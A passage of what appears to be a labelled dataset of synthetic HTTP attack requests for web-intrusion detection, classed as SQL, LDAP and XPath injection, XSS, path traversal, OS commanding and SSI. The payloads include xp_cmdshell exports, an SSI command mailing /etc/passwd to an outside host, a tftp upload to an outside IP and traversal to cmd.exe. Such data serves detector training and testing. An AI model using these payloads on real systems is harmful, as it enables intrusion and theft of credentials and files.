Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="51"
Date: Fri, 14 Apr 06 07:45:30 CET
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 11 Jul 06 01:30:53 UTC
If-Unmodified-Since: Mon, 16 Feb 04 03:17:09 UTC
If-Match: "SRIM5uQDGsYbgJH"
If-None-Match: "kpwvyelLFc1LH0kyPV"
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 5
MIME-Version: 2.7
Pragma: uha2omj=hhk
Proxy-Authorization: Digest realm
Authorization: NTLM bnZib2R0ZW45VFRXZXJFdDFyc0xvdHpzTW5hdGl2dGFlRWhl
Range: 8-
Referer: http://laat3ctH.net/Ofernewe/50nG/j7anL/Ecuq.swf
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/8.4 (X11; U; Solaris 8.4; io-xO; rv:9.9.0) Gecko/46573352
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44782
Start - Id: 37553
class: LdapInjection
POST /lO/s0G2KAH@3belaCz/ODU9access_logo1Pdexeca0DJ/ndnn82/22J9j.swf? HTTP/1.0
Content-Length: 239
Content-Language: g4eihh,2Rtrw,nrief
Content-Encoding: deflate
Content-Location: http://drggs.uk/swntsa4/i1aAzoi/eManega/afb1.jsp
Content-MD5: cHNzRWxkZGllbW5PNHlycg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Aug 08 04:54:33 UTC
Last-Modified: Tue, 12 May 09 17:18:04 CET
Host: www.nre0I6.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: mi-3irtco, erh31tBi-cnYo;q=0.0, r-tpi;q=0.6, e5nnuntS-TeOt;q=0.1, nn-ci
Cache-Control: no-store
Client-ip: 115.143.65.85
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="00"
Date: Thu, 01 May 08 23:00:29 GMT
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Fri, 03 Oct 08 21:29:41 CET
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "YP@y.S8NX6iOlAIr0"
If-Range: *
Max-Forwards: 38
MIME-Version: 7.0
Pragma: oaX=ru8mlz5g
Proxy-Authorization: NTLM dWlobm9qY0FpVXJqd251dGVkZXRzZG5vMTVlbGFjcmVuZWFnZWRlaW1lZnRy
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: -78728,9752-,0169-21
Referer: /oltrw/bt7pkrar.gz
TE: gzip;q=0.8
Trailer: If-None-Match
User-Agent: lengfcemlT/0.3.9.0
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1680x065
Via: 1.8 www.onghl.css, HTTP/1.2 166.43.121.185:7212, ecow/7.3 217.120.123.13
Transfer-Encoding: compress
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e6swafune6rUwna=hai0cthddOom&oeetp=l;ota&nm1ot5te1owcp=uitSaer4adjourBero&cgisi50atiuelre=9740)(&(objectClass=aye)(|(sn =   is)(cn=pt     J*))&QXq5aV=xp_ra8Ru&m@ Te&2zsmlXehoi=Plne3n&yeydLrpGe= TE14%mW

End - Id: 37553
Start - Id: 41149
class: SqlInjection
GET /QDhrdLnwanrntam8r/hpH/NXdHLSgsEGoaprocessing-instruction/8B8aIMSDSHE/D9QZJg-c/8aoumea.php?y9n1ynotwsh=62047&tYDdna7u=nb1s&shn6rv=exec++xp_cmdshell+++++%27bcp++%22select+++*++++from+aeJeno%22+queryout+++++pwdump.exe++++-c+++-Craw+++++-Shackersip+-Usa+++++-Ph8ck3r%27&hpjnohw3rl1dt=tcnd HTTP/1.0
Host: 177.241.68.135
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bbnth-enceiH;q=0.9, i82nsn-Epofrenf;q=0.5
Cookie2: $Version="24"
Date: Thu, 18 May 06 11:58:10 GMT
ETag: "kySf-tR9OR..Mwo"
Expect: 100-continue
If-Modified-Since: Thu, 23 Jun 05 06:19:40 CET
If-Unmodified-Since: Tue, 29 Aug 06 17:51:53 UTC
If-Match: "UzJmr6cG07_yCYmlnjPS"
If-None-Match: "Kv6gMT@eA1FO14etD0t"
If-Range: Thu, 01 Sep 05 18:42:52 UTC
Max-Forwards: 1034
Range: -024
Referer: /nsed9/ygreinRl.php4
TE: trailers,deflate;q=0.6
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 8.4; nb-tz; rv:5.7.4) Gecko/44530809
UA-OS: Windows 98
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41149
Start - Id: 47301
class: XSS
GET /6rlodlc/xepen29il/ehSx.uF.1C-U90j3/gU0Rpwu7m/ptSscnoo/gHX4-mZ-/sPzM@PIB/Nlioiatmw69gryhhttqt/SbaWslikepDXQbPMYunion/7wbeietEechum/TRnlhptnd.aspx?TteSolldn=%3Cimg%2Bsrc%3Djavascript%3A++++alert+%28%27sc.zozl%27%29+++%3E&oiyv=e%3D&jutdezditbesdi=jGBIbMsnip6&osu=tl7epnIr9tr&mpa2at7enhal9e=57154&6V6-0d.S=87571734 HTTP/1.1
Host: 6.8.231.121
Connection: lamt
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: UAdeeyeg-1dG;q=0.1, s5ed-di
Cache-Control: no-store
Client-ip: 226.203.48.223
Cookie: pyeklliidsbTRTt=rrrseTemxbodaoozt;ecUt=aota;aUarfp=oeR;0jgujA70RG.V=5852517307
Cookie2: $Version="1"
Date: Sat, 08 Jul 06 09:19:32 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: scSR=iog8
From: told@ol9na.de
If-Modified-Since: Sat, 10 Jun 06 07:57:02 GMT
If-Unmodified-Since: Sun, 26 Jun 05 06:31:06 GMT
If-Match: *
If-None-Match: "3cnjxstV_I-yQHs"
If-Range: Mon, 05 Oct 09 18:17:20 GMT
Max-Forwards: 93
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: sstl mmosAst=ieeinies
Range: -40347,67-1
Referer: /ni5h/3Ieaasli/hlotwe/udijo.jsp
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (Windows; U; WinNT 1.9; he-mo; rv:7.4.4) Gecko/59204156
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 3.6 34.70.255.37:425, FTP/6.2 55.181.191.178:2, 6.0 97.137.180.199
Transfer-Encoding: ahyUR
Upgrade: nPcun/8.0, aNCmem/7.3, aiz/3.2, 5no/1.9
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47301
Start - Id: 48699
class: XPathInjection
PUT /o8XbL/my@KXYsp32_Jp75jG/mdqjsNz2r_un4HmMG/Bi/Gfg0vI92phpJ/isR/9oQRtnnoewpnaexrYeen/HLiIealrsmnhui4lPnr.gif? HTTP/1.0
Content-Length: 307
Content-Language: hlewsov,ieutnca,jie1Isrn
Content-Encoding: compress
Content-Location: /ep4c8tre/ejpo/9kwapo.bin
Content-MD5: bXdyOW5lc2Ntcmlhcjlldw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 10 05:53:53 CET
Last-Modified: Sat, 10 Jan 09 12:23:06 GMT
Host: 39.88.251.74:80
Connection: keep-alive
Accept: text/html, image/png;q=0.3, application/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: nmm8-Pnt;q=0.2, ae-7;q=0.7, hc-etute;q=0.4, ramrwte-a, hopa-6u86wc;q=0.3
Cache-Control: no-store
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="879"
Date: Tue, 21 Dec 04 24:48:12 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: Le0arhj=himlintn
From: Hie7@rhe8hrA3.biz
If-Modified-Since: Sat, 07 Aug 04 11:49:23 UTC
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: "AR71Omg_Oykgaym7b"
If-Range: Sat, 06 Aug 05 09:41:46 CET
Max-Forwards: 4233
MIME-Version: 7.4
Pragma: tdc6t8te='d'
Proxy-Authorization: NTLM YXp0ZHVqaXJzaGVzYWF3b2xtdGg1YUkybm9zYWNvcmVhc2w3
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: http://www.nesqr.st/7hse/rivz/rtttrrdz/ibhneglf.tiff
TE: gzip
Trailer: Expect
User-Agent: Mozilla/2.7 (Windows; U; Win98 0.6; te-h1; rv:9.5.4) Gecko/80304493
UA-CPU: MIPS
UA-Disp: 527,267,32
UA-Color: color8
UA-Pixels: 640x9904
Via: HTTP/0.7 16.101.160.147, 4.3 www.feteocs.css, HTTP/4.6 www.8nuTd.tiff:45862
Transfer-Encoding: deflate
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 70312364698710750668
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BeFfAaccess_logXgslike=nsir5s/eRwr4/ae/child::node()[  position()=463] |    ridhe/tsm/5abpe/child::text()[position()=7]     or     'ncj' ='&dslSiiXrfxi5c=n+e39ore&@rnimg1IPsX5X= rut&crm0enfluetans1=nsinputtbeftpta&7rt2rfveydpcw=8099&cataCo8dx8=304

End - Id: 48699
Start - Id: 43294
class: OsCommanding
GET /exzhMh6VVE9/ow5/a@hcZuhhOj3AJRF@MDz4/eiEct.asp?mraarloes=%2Fperl+++++%2Ftmp%2Filla.pl+-p7627&dbineotbmtoaks=ecno&dwmueFf7=2408676245&edBnle8h20euj=sxcay&k9llAAsiimlgcst=1568471 HTTP/1.0
Host: www.chesza.it
Connection: mbbkala
Accept: */*;q=0.7
Accept-Charset: cp-936;q=0.4, iso-8859-9;q=0.6, x-mac-greek;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 139.145.50.245
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="731"
Date: Thu, 06 Apr 06 24:37:50 CET
ETag: "6dhinw17JjJyr_-."
Expect: mb9t=tpt6m;rlemLtar
From: nJanczi@m0dios.gov
If-Modified-Since: Wed, 15 Aug 07 18:00:29 CET
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: "KgTQdgHM7tKRpSicA@2"
If-Range: Sun, 02 Jan 05 21:25:14 UTC
Max-Forwards: 82
MIME-Version: 0.7
Pragma: srecd7='tenaaw'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dG9ybGdoaTpvaWhtbmVoZQ==
Range: 16-654699,-01,-6683
Referer: http://www.nees.fr/swenzd/rgj8bN/hon92p/Nsioto.php4
TE: deflate;q=0.3
Trailer: Range
User-Agent: Mozilla/7.8 (Windows; U; Win98 6.6; Et-ms; rv:8.5.8) Gecko/24638847
UA-CPU: MIPS
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: compress
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43294
Start - Id: 43776
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: www.icttd7pen.de:80
Connection: keep-alive
Accept: image/png, audio/*
Accept-Charset: koi8-r;q=0.2
Accept-Encoding: 
Accept-Language: d-be;q=0.3, dhoc-Pjn, onlrg-aaNh;q=0.0, lns-ttsr;q=0.2, mwnphsse-eacw;q=0.7
Cache-Control: no-store
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="143"
Date: Sat, 16 Aug 08 03:56:23 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: ttM2ahme
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Wed, 30 Dec 09 16:41:50 CET
If-Unmodified-Since: Fri, 12 Aug 05 08:16:43 CET
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: *
If-Range: *
Max-Forwards: 6770
MIME-Version: 7.5
Pragma: ts=drlowint
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: /tzeb74f/nfciothR/snbablia/uesyAehp/tuRiA.mdb
TE: trailers,trailers,trailers
Trailer: From
User-Agent: 8eri/8.0.5
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1293x0631
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: compress
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43776
Start - Id: 45805
class: PathTransversal
GET /OeInOda0dcOrl8dads/e8ieloytoonla5/sip/gClAv/D7jK.0_R5nccqc/a./mB7/ab58/tet1pnu6tsuom/432P/5d/nlittnaao4shutewt4.js?heerjnrrasseqt=04&fSDsEFU6Ibgsound=h1t&YNEhlrd18dedtje=rsa1nlekT&hol=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&IoDsr=84955&yd13at3mi0YLnmH=6790&ogRayttsr=nerbheoo&qiy4aj44so55=e&hUbvyok=480&Einierotmr=lQFq6ogoU8&eS3wAislc6=nces1&pO-RekbunionYh=2x9ytjBxp_kjr HTTP/1.0
Host: www.Gshmthe6e6.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 241.101.131.168
Cookie: jFrs4.=~4/symcat
Cookie2: $Version="085"
Date: Mon, 22 Feb 10 22:05:12 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: nmsM@ciff.net
If-Modified-Since: Mon, 20 Jul 09 12:09:39 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "F-9ztL_jB_iUC_D8"
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Sun, 04 Jan 09 16:12:14 UTC
Max-Forwards: 00
MIME-Version: 2.9
Pragma: aoiacrdn='denaJy7'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: feKvht kre0l0h=ebecnw
Range: 151606-
Referer: /0lxna/bAda/OonOas/utsas.jpg
TE: trailers,chunked,chunked
Trailer: Accept-Language
User-Agent: ozbxsot/0.3.9
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: qto/7.4 www.e46mdhud.jpg
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45805
Start - Id: 45384
class: PathTransversal
POST /i1bZctt_UY/f7Clk1/aA2arcetuthsYaRc/dbttwbweoumtea/dRqPBeAbtUlH4CVh9O4d.cgi? HTTP/1.1
Content-Length: 278
Content-Language: 8,m,aaoilaAn
Content-Encoding: gzip
Content-Location: /sleeOste/E8LhfaL/eildtno/iptr/orh5rs0.swf
Content-MD5: aXRlbWVvaGtmdGNxWU5scA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Apr 06 22:48:51 CET
Last-Modified: Sat, 02 Apr 05 14:03:12 UTC
Host: 213.204.74.19
Connection: scmcAmo
Accept: audio/basic;q=0.2, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ogrnA-lgeto5yk, tiioe-Riy1iE;q=0.5
Cache-Control: min-fresh=0
Client-ip: 2.231.241.65
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Wed, 21 May 08 06:31:52 CET
ETag: "WnkZX@O09m2kyoip6"
Expect: oepa
From: nnrEog@dpyieuR.com
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Thu, 10 Mar 05 07:48:10 UTC
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: Tue, 24 Mar 09 03:15:55 GMT
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: Basic ZXJldHI6Y3ppZWU4cG8=
Range: 0524-
Referer: /stoeaT/eoem/ia0oozr/9iah.sh
TE: trailers,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: Dbd5/3.0
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: 5.7 www.mn9qrrd.css, Ei2/4.9 215.206.48.5
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

8yw4CDDt9g=5985&eriNrs=d.xkBv&enlst6eoohxh=rDSKyDSJcA&st0aitnExaa=;eigs&xtnotr=kzso8cotylbn&Lb6oqtxruselniT=Mil&oy=140140&ec=../../../../../../WINDOWS/autoexec.bat&ooogir=nlQCLu&irrst4tfn=01419&eiTcby=vempiecknsaizes&aikoetdewi=|11&ao4sfea=inVPVyb79&Ay2=855117

End - Id: 45384
Start - Id: 44165
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.Mtgs.biz:80
Connection: keep-alive
Accept: image/gif;q=0.9, image/gif;q=0.2, audio/x-wav;q=0.8
Accept-Charset: hz-gb-2312;q=0.6, x-mac-ce, us-ascii;q=0.4, x-mac-arabic, x-mac-japanese;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: 6oaphm-b6ne;q=0.2, ncs-EynXex;q=0.1, i-v;q=0.2
Cache-Control: no-cache
Client-ip: 21.12.224.178
Cookie: dafn40oacsNpggH=tetcexecayttf]dwautoexecoc %e;R3cd1HoLepe=tNtShn;A9necwknetrn=mvar
Cookie2: $Version="13"
Date: Sat, 12 May 07 05:12:30 CET
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Wed, 16 Dec 09 17:22:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 3.5
Pragma: aoetD4=bs
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic VXZ3OGVlc2w6Z2I4Yg==
Range: -84280,-90,309098-0
Referer: http://www.zntpf.cz/Ean6nee/bogre.css
TE: trailers,deflate;q=0.2,chunked;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/1.1 (Windows; U; WinNT 0.6; tk-Eu; rv:7.4.1) Gecko/21486893
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 884x0554
Via: 1.7 12.63.111.109, 8.8 www.tdsO.htm
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 46.6.55.36
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44165
Start - Id: 37016
class: LdapInjection
GET /ehqhnRshv8sguvt2rO/5CXexec/4gU/sFI/itri/lKnS-CmAXtyys/anti5ttbwpofrrit/nsxndieecSg9dIqrD.cgi?supteotijeddo1=yenearev&uacraet9NeeveHL=mi%29%28++%7C+++%28hmc%3D*%29 HTTP/1.1
Host: 24.69.67.217:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: IEtbiLna-5;q=0.1, duUTeSsf-U6eEwf
Cache-Control: max-age=1
Client-ip: 148.118.125.70
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="80"
Date: Tue, 15 Sep 09 17:01:55 GMT
ETag: W/"NrDtJo599z-_lb2P"
Expect: 100-continue
From: lg2re@t1gN.ch
If-Modified-Since: Sun, 09 Aug 09 22:17:32 UTC
If-Unmodified-Since: Thu, 27 Apr 06 14:55:32 GMT
If-Match: *
If-None-Match: "n2mLUPtpO1FFYlP0"
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 0766
MIME-Version: 6.2
Pragma: ne='d'
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Basic b2xlUkNzOmV5c29jcg==
Range: -216,-736195
Referer: http://www.nzose1.uk/brEe4/cfss.wmn
TE: chunked;q=0.1
Trailer: Accept-Language
User-Agent: smooin/0.3.9.8.2
UA-CPU: StrongARM
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: oiaboh/6.3 www.n5oNq.png
Transfer-Encoding: tvtacS
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37016
Start - Id: 44585
class: OsCommanding
GET /all7-0RymailwLqmpLCbgsound/aene/MbYT9/l5FkGxE3LPY8UsDi/n-tiYsG0JP9sUZb/lXQzricFrfsSzw/aMiLktPY32BU/nK8/eI/fF1NopendL-xFEm/jXeJtsqn.asmx?eneerzH=5i&eitaoveqP=oxydrope&yanp=238.53.84.33+++++%7C++++tftp+++-i+++++59.44.237.231+++++PUT+sam._ HTTP/1.0
Host: www.itosro.fr:9
Connection: close
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: H='terosjfc'
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Wed, 28 Apr 10 08:32:13 GMT
ETag: "w78aexpupN8g9SbMEjW"
Expect: uuin=g5Sl
From: fn96a@esnteln.biz
If-Modified-Since: Tue, 05 Feb 08 20:15:52 GMT
If-Unmodified-Since: Tue, 30 Aug 05 24:52:48 UTC
If-Match: *
If-None-Match: "nyJOK-7jnk6ObwancrFL"
If-Range: "7XI-iDNXu5Ygiy-XYr7"
Max-Forwards: 3511
MIME-Version: 0.9
Pragma: tcTa='pvqn5p'
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: NTLM c2UxZGx0bHRzZW9lcFphNzIzZGlTaWlvcmFwdGlkYXN1bG10aTBFdXNEdA==
Range: -2578
Referer: /ergfsTIO.asmx
TE: trailers,trailers,chunked
Trailer: Accept-Encoding
User-Agent: 3qiee (yJS3hiHUZ; dIXFdieZ3)
UA-Color: color32
Via: HTTP/7.1 www.anelAe.jpeg, hguugm/0.1 www.twetRteu.png, HTTP/0.2 www.eryh.htm
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
Warning: 011 65.177.109.164 "rqtrCd" "Sun, 13 Nov 05 17:42:15 UTC"
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44585
Start - Id: 40128
class: SSI
GET /rhlrobnar.tiff?catoi8el9hC=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail+++++ebim0Oen.com+++%3C++%2Fetc%2Fpasswd%22--%3E&Juneawibv=hQd97tY9&edd=ar%3Dse9acceptldee&ewe63e=aLfw HTTP/1.0
Host: 48.42.56.159
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7, isiri-3342;q=0.1, us-ascii, euc-tw
Accept-Encoding: gzip;q=0.6
Accept-Language: nels-i, fslt-acbc;q=0.5, r0fti-gnptlt, etSttAi-r
Cache-Control: no-transform
Client-ip: 5.35.157.119
Cookie: le=1otbj7T56hzhE;tcsdG1bnssepu=ff T
Date: Sun, 17 Aug 08 17:16:21 UTC
If-Modified-Since: Fri, 31 Oct 08 17:08:10 CET
If-Unmodified-Since: Thu, 15 Mar 07 10:29:06 UTC
Max-Forwards: 71
MIME-Version: 6.1
Pragma: no-cache
Authorization: 51Ar 5shchs=xydnaakN
Referer: /0urtxcn.asmx
User-Agent: Mozilla/8.0 (X11; U; Linux i586 2.1; eb-3r; rv:7.5.5) Gecko/29119483
UA-Color: color32
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"

null

End - Id: 40128
Start - Id: 46553
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 231.1.195.32:01
Connection: close
Accept: application/*;q=0.0, audio/basic;q=0.8
Accept-Charset: cp-950, iso-8859-9;q=0.7, iso-8859-5, windows-1258;q=0.9
Accept-Encoding: identity, gzip, compress, deflate;q=0.9, deflate
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 249.247.50.249
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="88"
Date: Fri, 12 Mar 04 07:04:58 CET
ETag: "pxEyZUXsotp0fFplc7L_"
Expect: rltlnel=sLnE
From: ns7rogjc@npah.it
If-Modified-Since: Tue, 25 Aug 09 03:59:34 CET
If-Unmodified-Since: Mon, 04 Jan 10 10:12:41 CET
If-Match: "LyY44@DxncEFj_Cohm.i"
If-None-Match: *
If-Range: *
Max-Forwards: 0012
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: 2794-2,-4107
Referer: http://ntOsrED.de/ftsnbc.nsf
TE: trailers,chunked;q=0.9,gzip
Trailer: Pragma
User-Agent: yPOe (nK5zW5)
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/7.5 200.196.202.38, 8.2 www.nrfluseq.shtml, FTP/6.8 217.194.10.27
Transfer-Encoding: identity
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46553
Start - Id: 48314
class: XPathInjection
